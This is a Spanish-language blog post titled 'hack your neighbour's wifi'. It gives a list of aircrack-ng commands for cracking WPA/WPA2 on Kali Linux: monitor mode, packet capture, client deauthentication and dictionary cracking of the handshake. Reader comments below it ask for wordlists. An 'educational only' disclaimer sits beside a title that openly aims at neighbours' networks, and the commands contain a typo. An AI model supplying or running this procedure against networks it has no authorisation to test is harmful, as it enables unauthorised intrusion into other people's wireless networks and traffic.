Hackear a tu vecino wifi con claves WPA & WPA2 con Aircrack-ng en #KaliLinux2.0

how_to_crack_wpa_and_wpa2_with_aircrack_ng_on_kali_linux-min-696x407

 

En este tutorial vamos a enseñarte Cómo romper WPA y WPA 2 con aircrack-ng en Kali Linux. Nos alta recomendamos esto para la investigación o el único propósito educativo.

Nota: Este tutorial es sólo para fines educativos. Utilice esta herramienta bajo su propio riesgo, no nos hacemos responsables de cualquier daño que le causan.

Las cosas que utilizan para la formación de CRACK WPA y WPA2:

Comandos crack WPA & WPA2:

airmon-ng 
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0 
airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap
sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up 

 

Aviso: Funciona con un buen diccionario.

Aquí hay un video de YouTube sobre cómo romper WPA y WPA2 con Aircrack-ng en Kali Linux:

12 pensamientos en “Hackear a tu vecino wifi con claves WPA & WPA2 con Aircrack-ng en #KaliLinux2.0

  1. Amigo buen dia, buen apoyo con este tutorial, pero de pronto puedes dejarnos el link de descarga de ese buen diccionario para realizar las pruebas. Gracias por tu pronta respuesta .

    Me gusta

  2. Hola soy dennys y eh seguido tus paso al.pie de la letra, pero tengo una duda como hago para ingresar el diccionario ya q tengo uno de 26 gb agradezco tu colaboración

    Me gusta

  3. una pregunta tu hiciste el diccionario con crunch ? o con alguna otra herramienta ? se podría saber la sintaxis del diccionario que usaste ? solo para poder hacer uno .. parecido es que por mas que quiero no me sale el diccionario como yo quiero obviamente crunch viene mas limitado pero otros que usado igual no son tan complejos como la complegidad de las reglas que le quiero poner a mi diccionario😦 no hayo la solución ..

    Me gusta

  4. Bueno dias yo lo hice con el diccionario de kali linux, y no me a funcionado, tendre que buscarme otro, no?, me ha encantado tu paguina, gracias y un saludo cordial.

    Me gusta

Responder

